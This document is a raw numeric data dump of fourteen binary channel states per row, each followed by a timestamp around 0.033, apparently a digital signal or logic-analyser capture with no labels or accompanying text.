1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852420e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852448e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852472e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852500e-02 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2852548e-02 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2852572e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852580e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852596e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852620e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852648e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852672e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852700e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852724e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852748e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852772e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852796e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852820e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852848e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852872e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852900e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852924e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852948e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2852972e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2852996e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853020e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853048e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853072e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853100e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853124e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853148e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853172e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853196e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853220e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853248e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853272e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853300e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853328e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853348e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853376e-02 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2853400e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2853424e-02 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2977096e-02 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2977268e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.2977284e-02 0,1,0,1,0,0,0,0,0,0,0,1,0,1,3.2977316e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.2977340e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.2977640e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.2977668e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.2977692e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.2977716e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.2977740e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.2977764e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.2977788e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.2977812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.2977836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.2977860e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.2977868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.2977888e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.2977912e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2977928e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2977940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2977964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2977988e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978012e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978020e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978036e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978060e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978088e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978112e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978140e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978164e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978188e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978212e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978220e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978236e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978260e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978288e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978312e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978340e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978364e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978368e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978388e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978412e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978460e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978488e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978512e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978564e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,3.2978568e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978588e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978612e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978636e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978660e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978688e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978712e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978716e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978740e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978764e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978788e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978812e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978836e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978860e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2978888e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2978912e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978920e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2978964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2978988e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979012e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979064e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979088e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979212e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979236e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979288e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979364e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979388e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979436e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979464e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979488e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979512e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979516e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2979540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979564e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2979588e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979612e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2979636e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979660e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2979688e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979712e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2979740e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2979764e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,3.2979768e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979772e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979788e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979812e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979836e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979860e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979888e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979912e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979940e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2979964e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2979988e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980012e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980036e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980060e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980068e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2980084e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980108e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980116e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980136e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980164e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980188e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980212e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980236e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980260e-02 0,1,0,1,0,0,0,0,0,1,0,0,0,0,3.2980264e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980268e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2980284e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980308e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2980336e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980364e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2980388e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980412e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2980436e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2980460e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980484e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980508e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980536e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980564e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980612e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980636e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980684e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980708e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980764e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980836e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980880e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2980940e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2980980e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981040e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981084e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981108e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981132e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981156e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981160e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981176e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981196e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981208e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981220e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981244e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981252e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981268e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981288e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981308e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981332e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981356e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981380e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981388e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981400e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981444e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981468e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981516e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981520e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981564e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981588e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981616e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981644e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981668e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981692e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981716e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981780e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981812e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981824e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981844e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2981868e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2981892e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981900e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981916e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981936e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2981956e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2981980e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982004e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982028e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982048e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982068e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982092e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982116e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982168e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982172e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982192e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982220e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982224e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982244e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982268e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982292e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982316e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982340e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982368e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982392e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982420e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982444e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982468e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982476e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982492e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982516e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982524e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982540e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982568e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982592e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982620e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982644e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982668e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982692e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982716e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982740e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982768e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982772e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982792e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982820e-02 0,1,0,1,0,1,0,0,0,0,0,0,0,0,3.2982824e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982844e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982868e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2982892e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2982916e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982924e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982940e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2982968e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2982992e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983020e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2983044e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983068e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2983092e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983116e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983124e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983140e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983168e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983192e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983220e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2983244e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983268e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983296e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983324e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983348e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983372e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983396e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983420e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983448e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983472e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983476e-02 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.2983500e-02 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.2983524e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983532e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983548e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983572e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983596e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983620e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983648e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983676e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983700e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983724e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983748e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983776e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983800e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983828e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983852e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983876e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983900e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983928e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2983952e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2983980e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984004e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984028e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984052e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984076e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984100e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984128e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984152e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984180e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984204e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984228e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984252e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984276e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984300e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984328e-02 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.2984352e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.2984380e-02 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109000e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109220e-02 1,1,0,1,0,0,0,0,0,0,0,1,0,1,3.3109236e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109264e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109548e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109572e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109596e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109696e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109720e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109748e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109772e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,1,3.3109796e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,1,3.3109820e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3109832e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3109844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3109868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3109896e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3109920e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3109948e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3109972e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3109996e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110020e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110044e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110068e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110096e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110120e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110148e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110172e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110196e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110220e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110244e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110268e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110292e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110316e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110340e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110368e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110392e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110420e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110444e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110468e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110492e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110516e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110540e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110568e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110592e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110620e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110644e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110668e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110692e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110716e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110740e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110768e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110792e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110820e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110844e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110868e-02 1,1,0,1,0,0,0,0,0,0,0,0,1,0,3.3110892e-02 1,1,0,1,0,0,0,0,0,0,0,0,0,0,3.3110916e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3110924e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3110940e-02 1,1,0,1,0,1,0,0,0,1,0,0,0,0,3.3110968e-02 1,1,0,1,0,1,0,0,0,1,0,0,1,0,3.3110992e-02 